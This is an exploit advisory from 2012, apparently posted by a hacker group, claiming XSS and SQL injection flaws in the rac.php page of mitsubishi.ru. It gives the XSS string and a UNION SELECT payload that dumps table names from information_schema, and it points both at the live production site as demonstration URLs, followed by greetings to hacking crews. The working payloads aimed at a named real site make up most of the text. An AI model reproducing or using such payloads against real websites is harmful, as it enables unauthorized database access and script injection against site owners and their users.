################################################## # Exploit Title: Mitsubishi.ru XSS/SQL Injection Vulnerability # Date: 23/04/2012 # Author: Ryuzaki Lawlet # Web/Blog: http://justryuz.blogspot.com # Category: webapps # Security:RISK: High # Vendor or Software Link:- # Google dork: - # Tested on: Linux ################################################## [~]Exploit/p0c : http://localhost:80/rac.php?m=[xss] http://localhost:80/rac.php?m=[sql] [~]Proof of Concept: 1.1 he issue can be exploited by an insert on the Created Object function with script code as value. The result is the persistent execution out of the web application context.  Strings: >"< OR >" [~]Dem0 : http://www.mitsubishi.ru/rac.php?m=>"< http://www.mitsubishi.ru/rac.php?m=-1859+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,group_concat(table_name),55+from+information_schema.tables+where+table_schema=database()--  FB : www.fb.me/justryuz +---------------------------------------------------+   Greetz to : [ CyberSEC,Newbie3vilc063s,Rileks Crew,h3x4 Crew,C4,T3D Hackers,] [ Antuwebhunter = Sbkiller CyberSEC = Misa CyberSEC = Ben CyberSEC = Xay CyberSEC = LoneLy CyberSEC = b0ogle ] [ And all my Freinds + Malaysian + Indonesia + Gaza & Turki ] -----------------------------------------------------+ CyberSEC © 2012 All rights reserved.